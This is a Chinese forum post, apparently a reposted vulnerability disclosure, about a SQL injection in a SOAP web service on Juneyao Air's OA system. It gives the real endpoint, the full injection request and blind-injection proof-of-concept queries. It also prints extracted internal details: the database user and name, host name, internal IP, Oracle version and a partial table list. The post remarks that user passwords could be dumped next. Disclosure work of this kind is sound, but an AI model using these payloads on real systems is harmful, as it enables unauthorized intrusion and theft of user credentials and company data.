HanDs
管理员

[7月漏洞公开] 航空安全之吉祥航空某系统web service注入漏洞 



RT

详细说明:

#1 http://oa.juneyaoair.com//services/

1-1.png



#2 注入位置

code 区域
POST http://oa.juneyaoair.com//services/MobileService HTTP/1.0
SOAPAction: ""
Content-Type: text/xml

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:xsd="http://www.w3.org/1999/XMLSchema" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:m0="http://tempuri.org/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Header/>
<SOAP-ENV:Body>
<checkUserLogin xmlns="webservices.services.weaver.com.cn">
<in0>1' or '1'='1</in0>
<in1>1</in1>
<in2>1</in2>
</checkUserLogin>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>



1' or '1'='1 结果为5

1' or '1'='2 结果为4

#3 本地通过C#编写代码, 进行中转注入

1-2.png



#4 数据证明

POC:

code 区域
1' or (select sys_context('userenv','isdba') from dual)='FALSE' and '1'='1 True
1' or (select sys_context('userenv','current_user') from dual)='OA' and '1'='1 TRUE
1' or (select sys_context('userenv','db_name') from dual)='oanew' and '1'='1 TRUE
1' or (select count(distinct(owner)) from sys.all_tables)=9 and '1'='1 TRUE



code 区域
用户名:OA
当前数据库: oanew
主机名: OA1-SRV
主机IP:172.20.21.41
数据库版本: Oracle Database 11g Enterprise Edition Release 11.2.0.1.0 - 64bit Production



数据库

1-3.png



OA数据库共有2008个表

POC:

code 区域
1' or (select count(*) from sys.all_tables where owner='OA')=2008 and '1'='1



仅列出部分表

code 区域
HPELEMENTSETTING----2016/5/26 14:48:15
WORKFLOW_FORWARD----2016/5/26 14:48:18
DOCCDANGEWFFIELD----2016/5/26 14:48:20
DOCCHANGESETTING----2016/5/26 14:48:27
PAGENEWSTEMPLATE----2016/5/26 14:48:28
DOCCHANGERECEIVE----2016/5/26 14:48:31
WORKTASK_MONITOR----2016/5/26 14:48:32
WORKTASKSHARESET----2016/5/26 14:48:32
WORKTASK_CODESET----2016/5/26 14:48:36
WORKTASK_BACKLOG----2016/5/26 14:48:37
WORKTASK_CODESEQ----2016/5/26 14:48:48
VORKFLOW_DEPTABBR----2016/5/26 14:48:54
WORKTASK_OPERATOR----2016/5/26 14:49:21
CPTCAPITALCODESEQ----2016/5/26 14:49:24
WORKTASK_TASKLIST----2016/5/26 14:49:25
DOCCHANGEWORKFLOW----2016/5/26 14:49:26
BILL_BOHAIEVECTION----2016/5/26 14:50:06
DOCSUBCATFTPCONFIG----2016/5/26 14:50:10
WORKFLOWXFIELDYEAR----2016/5/26 14:50:12
WORKTASK_FIELDDICT----2016/5/26 14:50:12
DOCSECCATFTPCONFIG----2016/5/26 14:50:18
DOCCHANGERECEIVEWF----2016/5/26 14:50:23
DOCHANDWRITTENCOLOR----2016/5/26 14:50:41
XMLREPORT_SHAREINFO----2016/5/26 14:50:45
CPTSEARCHDEFINITION----2016/5/26 14:50:49
FAVOURITELASTACTIVE----2016/5/26 14:50:54
DOCMAINCATFTPCONFIG----2016/5/26 14:50:57
CPTCAPITALEQUIPMENT----2016/5/26 14:50:57
DOCCHANGESENDDETAIL----2016/5/26 14:50:57
[email protected]/5/26 14:51:03
WORKFLOW_CREATETASK----2016/5/26 14:51:06
WORKFLOW_SUBCOMABBR----2016/5/26 14:51:08
WORKTASKCREATESHARE----2016/5/26 14:51:08
WORKTASK_TASKFIELD----2016/5/26 14:51:18
WORKTASK_REQUESTLOG----2016/5/26 14:51:18
WORKTASK_SELECTITEM----2016/5/26 14:51:21
OFID----2016/5/26 14:51:22
WORKFLOW_DEPTABBRDEF----2016/5/26 14:51:31
DOCHANDWRITTENDETAIL----2016/5/26 14:51:32
OUTERDATAWFSETDETAIL----2016/5/26 14:51:46
OUTERDATAWFPERIODSET----2016/5/26 14:51:46
OFUSER----2016/5/26 14:51:47
WORKFLOW_TRACKDETAIL----2016/5/26 14:51:49
WORKTASK_REQUESPBASE----2016/5/26 14:52:11
WORKDLOW_SPECIALFIELD----2016/5/26 14:52:56
MAILSIGN----2016/5/26 14:52:57
OFVCARD----2016/5/26 14:53:02
OFGRLUP----2016/5/26 14:53:12
HRMORGGROUP----2016/5/26 14:53:36
OFROSTER----2016/5/26 14:53:43
WORKFLOW_SUBCOMABBRDEF----2016/5/26 14:53:49
WORKFLOW_SUPSUBCOMABBR----2016/5/26 14:53:56
SYSFAVOURITE_FAVOURITE----2016/5/26 14:53:56
[email protected]/5/26 14:54:00
WORKFLOW_CODESEQRECORD----2016/5/26 14:54:03
OFPRIVATE----2016/5/26 14:54:31
...



跑的太慢了, 不继续跑了, 后续可获得大量数据, OA系统的用户名、密码等...

漏洞证明:

已证明!

修复方案:

没什么用的东西, 就删掉吧


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
航空
#1楼
发帖时间:2016-7-14   |   查看数:0   |   回复数:0
游客组
快速回复